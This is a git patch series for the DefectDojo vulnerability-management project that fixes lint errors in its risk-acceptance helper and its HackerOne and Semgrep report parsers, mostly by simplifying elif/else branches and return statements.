diff --git a/dojo/product_type/queries.py b/dojo/product_type/queries.py
index 27c3b31d707..1d95ac81170 100644
--- a/dojo/product_type/queries.py
+++ b/dojo/product_type/queries.py
@@ -53,6 +53,7 @@ def get_authorized_global_members_for_product_type(product_type, permission):
         return Global_Role.objects.filter(group=None, role__isnull=False).order_by("user__first_name", "user__last_name").select_related("role", "user")
     return Global_Role.objects.none()
 
+
 def get_authorized_groups_for_product_type(product_type, permission):
     user = get_current_user()
 
diff --git a/dojo/risk_acceptance/helper.py b/dojo/risk_acceptance/helper.py
index bc02b533f57..32dedf3f741 100644
--- a/dojo/risk_acceptance/helper.py
+++ b/dojo/risk_acceptance/helper.py
@@ -123,7 +123,7 @@ def remove_finding_from_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_A
             author=user,
         ))
-    return None
+    return
 
 
 def add_findings_to_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_Acceptance, findings: list[Finding]) -> None:
@@ -148,7 +148,7 @@ def add_findings_to_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_Accep
     # best effort jira integration, no status changes
     post_jira_comments(risk_acceptance, findings, accepted_message_creator)
 
-    return None
+    returnß
 
 
 @app.task
diff --git a/dojo/tools/h1/parser.py b/dojo/tools/h1/parser.py
index c386dec04d3..bdd60f44556 100644
--- a/dojo/tools/h1/parser.py
+++ b/dojo/tools/h1/parser.py
@@ -275,11 +275,11 @@ def get_findings(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]:
         file_name = file.name
         if str(file_name).endswith(".json"):
             return self.determine_json_format(file, test)
-        elif str(file_name).endswith(".csv"):
+        if str(file_name).endswith(".csv"):
             return self.determine_csv_format(file, test)
-        else:
-            msg = "Filename extension not recognized. Use .json or .csv"
-            raise ValueError(msg)
+
+        msg = "Filename extension not recognized. Use .json or .csv"
+        raise ValueError(msg)
 
     def get_json_tree(self, file: TemporaryUploadedFile) -> dict:
         """Extract the CSV file into a iterable that represents a dict."""
@@ -298,9 +298,9 @@ def determine_json_format(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]:
             return self.get_bug_bounty_program_json_findings(tree.get("findings", []), test)
         if "data" in tree:
             return self.get_vulnerability_disclosure_json_findings(tree, test)
-        else:
-            msg = "This JSON format is not supported"
-            raise ValueError(msg)
+
+        msg = "This JSON format is not supported"
+        raise ValueError(msg)
 
     def get_csv_reader(self, file: TemporaryUploadedFile) -> csv.DictReader:
         """Extract the CSV file into a iterable that represents a dict."""
@@ -317,6 +317,6 @@ def determine_csv_format(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]:
         # Check for some root elements
         if "bounty" in reader.fieldnames:
             return self.get_bug_bounty_program_csv_findings(reader, test)
-        else:
-            msg = "This CSV format is not supported"
-            raise ValueError(msg)
+
+        msg = "This CSV format is not supported"
+        raise ValueError(msg)
diff --git a/dojo/tools/semgrep/parser.py b/dojo/tools/semgrep/parser.py
index b7472005daa..3cd37c638f1 100644
--- a/dojo/tools/semgrep/parser.py
+++ b/dojo/tools/semgrep/parser.py
@@ -133,11 +133,11 @@ def convert_severity(self, val):
         upper_value = val.upper()
         if upper_value == "CRITICAL":
             return "Critical"
-        elif upper_value in ["WARNING", "MEDIUM"]:
+        if upper_value in ["WARNING", "MEDIUM"]:
             return "Medium"
-        elif upper_value in ["ERROR", "HIGH"]:
+        if upper_value in ["ERROR", "HIGH"]:
             return "High"
-        elif upper_value == "LOW":
+        if upper_value == "LOW":
             return "Low"
         elif upper_value == "INFO":
             if "WARNING" == val.upper():

From 4c60a809e033652faefb1b1b4c814f001fb0b95a Mon Sep 17 00:00:00 2001
From: Ross Esposito
Date: Mon, 23 Sep 2024 14:14:12 -0500
Subject: [PATCH 62/62] Fixing more lint errors pt 2

---
 dojo/api_v2/serializers.py     | 1 -
 dojo/risk_acceptance/helper.py | 2 +-
 dojo/tools/h1/parser.py        | 3 ---
 dojo/tools/semgrep/parser.py   | 2 +-
 4 files changed, 2 insertions(+), 6 deletions(-)

diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py
index 371f9f4266f..5109bd068f0 100644
--- a/dojo/api_v2/serializers.py
+++ b/dojo/api_v2/serializers.py
@@ -555,7 +555,6 @@ def validate(self, data):
         if self.context["request"].method == "POST" and "password" not in data:
             msg = "Passwords must be supplied for new users"
             raise ValidationError(msg)
-
         return super().validate(data)
 
 
diff --git a/dojo/risk_acceptance/helper.py b/dojo/risk_acceptance/helper.py
index 32dedf3f741..1cd1b15cdae 100644
--- a/dojo/risk_acceptance/helper.py
+++ b/dojo/risk_acceptance/helper.py
@@ -148,7 +148,7 @@ def add_findings_to_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_Accep
     # best effort jira integration, no status changes
     post_jira_comments(risk_acceptance, findings, accepted_message_creator)
 
-    returnß
+    return
 
 
 @app.task
diff --git a/dojo/tools/h1/parser.py b/dojo/tools/h1/parser.py
index bdd60f44556..8aa3fc5ff28 100644
--- a/dojo/tools/h1/parser.py
+++ b/dojo/tools/h1/parser.py
@@ -277,7 +277,6 @@ def get_findings(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]:
             return self.determine_json_format(file, test)
         if str(file_name).endswith(".csv"):
             return self.determine_csv_format(file, test)
-
         msg = "Filename extension not recognized. Use .json or .csv"
         raise ValueError(msg)
 
@@ -298,7 +297,6 @@ def determine_json_format(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]:
             return self.get_bug_bounty_program_json_findings(tree.get("findings", []), test)
         if "data" in tree:
             return self.get_vulnerability_disclosure_json_findings(tree, test)
-
         msg = "This JSON format is not supported"
         raise ValueError(msg)
 
@@ -317,6 +315,5 @@ def determine_csv_format(self, file: TemporaryUploadedFile, test: Test) -> list[Finding]:
         # Check for some root elements
         if "bounty" in reader.fieldnames:
             return self.get_bug_bounty_program_csv_findings(reader, test)
-
         msg = "This CSV format is not supported"
         raise ValueError(msg)
diff --git a/dojo/tools/semgrep/parser.py b/dojo/tools/semgrep/parser.py
index 3cd37c638f1..883fcc4f31a 100644
--- a/dojo/tools/semgrep/parser.py
+++ b/dojo/tools/semgrep/parser.py
@@ -139,7 +139,7 @@ def convert_severity(self, val):
             return "High"
         if upper_value == "LOW":
             return "Low"
-        elif upper_value == "INFO":
+        if upper_value == "INFO":
             if "WARNING" == val.upper():
                 return "Medium"
             if "ERROR" == val.upper() or "HIGH" == val.upper():